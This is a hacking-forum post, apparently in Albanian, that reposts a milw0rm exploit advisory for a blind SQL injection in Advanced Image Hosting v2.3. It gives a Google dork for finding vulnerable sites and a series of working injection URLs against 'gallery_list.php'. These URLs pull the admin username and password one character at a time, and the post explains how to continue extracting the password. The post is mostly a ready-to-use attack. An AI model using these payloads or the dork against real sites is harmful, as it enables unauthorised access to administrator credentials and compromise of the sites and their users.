~ aLbanian c0de ~
Would you like to react to this message? Create an account in a few clicks or log in to continue.
~ aLbanian c0de ~

~ aLbanian c0de ~


Advanced Image Hosting (AIH) Blind SQL Injection.

~ aLbanian c0de ~  :: ,.-~*'¨¯¨'*·~-.¸-(_Applications,Tutorials,Serialz_)-,.-~*'¨¯¨'*·~-.¸ :: SQL - Exploita

Shko poshtë

Advanced Image Hosting (AIH) Blind SQL Injection. Empty Advanced Image Hosting (AIH) Blind SQL Injection.

Mesazh nga system K1LL3r Sat Jan 30, 2010 3:41 pm

Kodi:
###################################################################
Advanced Image Hosting (AIH) Remote Blind SQL Injection
###################################################################


###################################################
#[~] Author        :  boom3rang
#[~] Greetz        :  H!tm@N, KHG, chs, redc00de
#[~] Vulnerability :  Blind SQL injection
#[~] Google Dork  :  Powered by: AIH v2.3
--------------------------------------------------
#[!] Product Name  :  Advanced Image Hosting   
#[!] Product Site  :  http://www.yabsoft.info
#[!] Version      :  v2.3
#[!] Download      :  http://yabsoft.com/aihs-feature.php
###################################################

[!] AIH Blind SQL Injection.

PoC / Live Demo:
-------------
http://yabsoft.info/demo/aihspro/gallery_list.php?gal=3'/**/and/**/ascii(substring((select/**/concat(admin,0x3a,pass)/**/from/**/setting/**/limit/**/0,1),1,1))>100--++

First charcter of the username is char(100) -->  char="d"
-------------
http://yabsoft.info/demo/aihspro/gallery_list.php?gal=3'/**/and/**/ascii(substring((select/**/concat(admin,0x3a,pass)/**/from/**/setting/**/limit/**/0,1),2,1))>101--++

Second charter of the username is char(101) -->  char2="e"
-------------
http://yabsoft.info/demo/aihspro/gallery_list.php?gal=3'/**/and/**/ascii(substring((select/**/concat(admin,0x3a,pass)/**/from/**/setting/**/limit/**/0,1),3,1))>109--++

Next charter of the username is char(109) --> char3="m"
-------------
http://yabsoft.info/demo/aihspro/gallery_list.php?gal=3'/**/and/**/ascii(substring((select/**/concat(admin,0x3a,pass)/**/from/**/setting/**/limit/**/0,1),4,1))>111--++

And The last charter of the username is char(111) --> char4="o"
-------------
Like we see the username is "demo" now you can continue finding another charters for password, changing the number of charters 5,6,7,8,9,10........?>


##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
##############################

# milw0rm.com [2009-03-18]
--------------------------------------------------------------------------------
system K1LL3r
system K1LL3r
Admininstrator
Admininstrator

Male Scorpio Numri i postimeve : 97
Piket : 269
Thanks : 0
Ditëlindje : 30/12/2009
Mosha : 30
Hobi : Hacking-Cracking

https://foorumi2010.albanianforum.net

Mbrapsht në krye Shko poshtë

Mbrapsht në krye

- Similar topics

~ aLbanian c0de ~  :: ,.-~*'¨¯¨'*·~-.¸-(_Applications,Tutorials,Serialz_)-,.-~*'¨¯¨'*·~-.¸ :: SQL - Exploita

 
Drejtat e ktij Forumit:
Ju nuk mund ti përgjigjeni temave të këtij forumi